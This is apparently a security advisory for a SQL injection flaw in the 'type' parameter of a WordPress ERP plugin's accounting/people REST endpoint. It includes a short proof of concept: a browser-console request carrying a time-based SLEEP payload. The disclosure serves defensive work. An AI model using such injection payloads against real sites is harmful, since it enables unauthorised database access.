The plugin does not properly sanitise and escape the type
parameter in the erp/v1/accounting/v1/people
REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
Sign in as an admin. In WP Admin, run the following code in the browser console, and notice that it takes several seconds to complete, demonstrating the SQL Injection vulnerability. await wp.apiRequest({path: /erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x
});